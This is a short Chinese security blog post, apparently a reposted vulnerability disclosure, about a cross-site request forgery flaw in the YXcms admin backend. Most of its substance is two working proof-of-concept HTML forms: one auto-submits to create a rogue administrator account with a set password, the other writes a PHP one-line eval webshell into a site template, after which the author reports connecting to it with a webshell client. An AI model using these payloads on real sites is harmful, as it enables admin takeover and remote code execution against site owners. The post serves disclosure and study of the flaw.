YXcms后台csrf添加管理员+getshell

没穿底裤 2020年1月1日05:19:46评论520 views字数 993阅读3分18秒阅读模式
摘要

蛇精病1、后台添加管理然后用burp截断我们发现没有验证,然后就构造表单2、再来看如何getshell

模版,新建


漏洞作者:

蛇精病

漏洞证明:

1、后台添加管理然后用burp截断

YXcms后台csrf添加管理员+getshell

我们发现没有验证,然后就构造表单

<html>    <!-- CSRF PoC - generated by Burp Suite Professional -->    <body>      <form id="post123" name="post123" action="http://127.0.0.1/index.php?r=admin/admin/index" method="POST">        <input type="hidden" name="groupid" value="1" />        <input type="hidden" name="username" value="snake" />        <input type="hidden" name="rpassword" value="wuyun1" />        <input type="hidden" name="spassword" value="wuyun1" />        <input type="hidden" name="realname" value="" />        <input type="hidden" name="iflock" value="0" />         <script>          document.getElementById('post123').submit();      </script>      </form>    </body>  </html>

 

2、再来看如何getshell

模版,新建

YXcms后台csrf添加管理员+getshell

插入一句话木马,然后截断

YXcms后台csrf添加管理员+getshell

同样没有验证,构造表单如下

<html>    <!-- CSRF PoC - generated by Burp Suite Professional -->    <body>      <form action="http://127.0.0.1/index.php?r=admin/set/tpadd&Mname=default" method="POST">        <input type="hidden" name="filename" value="1" />        <input type="hidden" name="code" value="&lt;&#63;php&#32;eval&#40;&#36;&#95;POST&#91;g&#93;&#41;&#59;&#63;&gt;" />        <input type="submit" value="Submit request" />      </form>    </body>  </html>

 

接下来用菜刀连接试试

YXcms后台csrf添加管理员+getshell

连接成功

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:19:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   YXcms后台csrf添加管理员+getshellhttps://cn-sec.com/archives/76267.html

发表评论

匿名网友 填写信息